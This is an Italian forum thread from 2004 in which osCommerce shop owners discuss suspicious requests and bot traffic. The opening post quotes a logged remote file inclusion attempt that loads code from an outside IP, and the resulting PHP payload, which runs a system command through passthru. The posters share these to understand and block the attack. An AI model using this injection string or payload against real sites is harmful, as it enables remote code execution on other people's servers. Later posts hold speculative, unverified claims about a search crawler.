Pagina 1 di 2
Sicurezza Oscommerce !!
Inviato: 22/09/2004, 9:30
da Mell
Ho notato che mi stanno inserendo dal browser delle stringhe tipo quelle per inserire dei comandi sql su phpnuke. La stessa stringa infatti è rilevata come tentativo d' intrusione in un portale phpnuke con sentinel (modulo per bloccare le intrusioni).
Le stringhe inserite sono queste:
Codice: Seleziona tutto
/catalog/products_new.php?page=http://66.89.120.35/ebekpko?
che da questo output:
Codice: Seleziona tutto
<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>
Mi sembra che c'è un contributo per bannare gli ip, potrebbe bastare?
Aiuto Hozone!
Inviato: 22/09/2004, 11:51
da ioivi
Io invece ho "guest" che accedono a pagine in teoria non accessibili ad un "guest"
Appena ne becco uno posto il link della pagina dove si trova .. mi è appena scappato ... quello che è interessante è l'ip ..
http://www.dnsstuff.com/tools/whois.ch?ip=65.54.188.74
Non credo molto al loro interesse per il mio store
Inviato: 22/09/2004, 13:02
da Domina
scusatemi ma come fate a usare dnsstuf su oscommerce?lo piazzate in remoto o come lo fate funzionare?
Inviato: 22/09/2004, 13:12
da ioivi
Domina ha scritto:scusatemi ma come fate a usare dnsstuf su oscommerce?lo piazzate in remoto o come lo fate funzionare?
Ho modificato il file whos_online.php.
Mi basta cliccare sul link in admin, si apre la pagina con il link che ho postato sopra
Inviato: 22/09/2004, 13:30
da Domina
ohhhh hai modificato whos_online.php...
e ti chiedo molto se ci dici come si modifica? : )
Inviato: 22/09/2004, 14:15
da ioivi
Domina ha scritto:ohhhh hai modificato whos_online.php...
e ti chiedo molto se ci dici come si modifica? : )
hehe .. io sono imbranato, non è tutta farina del mio sacco ...
Ho preso questa contribution:
http://www.oscommerce.com/community/con ... hos_online
La versione 1.2.5 per la precisione (ho visto ora che ci sono stati aggiornamenti)
Poi l'ho tradotta in italiano e modificato il codice per utilizzare dnsstuf
Il risultato?
Scarica la mia versione da qui
http://www.1accessori.it/contribution/w ... .5_ita.zip
Rinomina l'originale che trovi in catalog/admin e metti al suo posto questa versione.
Dimmi come la trovi
Inviato: 22/09/2004, 17:05
da ioivi
ioivi ha scritto:Appena ne becco uno posto il link della pagina dove si trova ..
Beccato!
Si trova qui ora
/catalog/checkout_shipping.php?osCsid=acea598dcc5019a2d586079ecb
con questo ip
http://www.dnsstuff.com/tools/whois.ch?ip=65.54.188.74
Sto qui da guest ci arriva .. io no, mi devo loggare ... come mai??
Guardate qui:
rieccolo un un'altra pagina ...
Inviato: 24/09/2004, 14:07
da ioivi
rieccolo un un'altra pagina ...
Inviato: 25/09/2004, 1:34
da Nausicaa
Quell'indirizzo insieme a molti altri appartengono all'MSN Bot, ovvero il motore di ricerca di microsoft, invasivo come pochi, che cerca di indicizzare tutto il mondo.... nel vero senso della parola...
Sul mio server sono arrivato a bannare tutti gli indirizzi al momento conosciuti... consuma banda come una sanguisuga, e altrettante risorse...
apre decine di connessioni contemporaneamente (e si permette addirittura di prendere e cercare di mandare messaggi privati sul forum dello stesso sito....).
Me lo ha fatto anche oggi, è stato più di un'ora a fare gli indici dell'oscommerce..... e poi mi chiedevo come mai andava lento il server....
comunque ora è in black list... fatelo anche voi se non volete che vi rompa le scatole.
Inviato: 25/09/2004, 8:43
da johnnystecco
Ciao, anch'io ho lo stesso problema ed è quasi 24 ore che consuma banda. Come posso mettrelo nella black list?
Grazie
Inviato: 25/09/2004, 9:07
da Nausicaa
Io lo ho bannato direttamente nel firewall del server, a quanto ne so in oscommerce non c'è un sistema di ban degli ip.
Inviato: 25/09/2004, 9:35
da Domina
vediamo effettivamente quanti shop hanno questo problema...
nn c'è una versione di osc da prendere in esempio ex poterla confrontare con la nostra?
Inviato: 25/09/2004, 17:49
da ioivi
Nausicaa ha scritto:Quell'indirizzo insieme a molti altri appartengono all'MSN Bot, ovvero il motore di ricerca di microsoft, invasivo come pochi. ... cut ..
Alla faccia dell'invasivo .. scusa come fa a leggere quei file da "guest"?
Io ne faccio una questione di sicurezza
Se tu provi ad andare a leggere quelle pagine da guest oscommerce ti spedisce nella pagina login.php ... perchè loro arrivano fino a li?
Inviato: 25/09/2004, 23:56
da ioivi
Nausicaa ha scritto:Io lo ho bannato direttamente nel firewall del server, a quanto ne so in oscommerce non c'è un sistema di ban degli ip.
Questo non potrebbe andare bene?
http://www.oscommerce.com/community/con ... rch,ban+ip
Inviato: 26/09/2004, 1:47
da Nausicaa
ioivi ha scritto:Nausicaa ha scritto:Quell'indirizzo insieme a molti altri appartengono all'MSN Bot, ovvero il motore di ricerca di microsoft, invasivo come pochi. ... cut ..
Alla faccia dell'invasivo .. scusa come fa a leggere quei file da "guest"?
Io ne faccio una questione di sicurezza
Se tu provi ad andare a leggere quelle pagine da guest oscommerce ti spedisce nella pagina login.php ... perchè loro arrivano fino a li?
Non sò dirti perchè riesca ad arrivare sino a li, sò solo che anche con il forum lo trovo ogni tanto che cerca di spedire messaggi privati agli utenti...
magari hanno un archivio con tutti i file e cercano di forzare il sistema continuando ad insistere....
cosa che mi aspetto da microsoft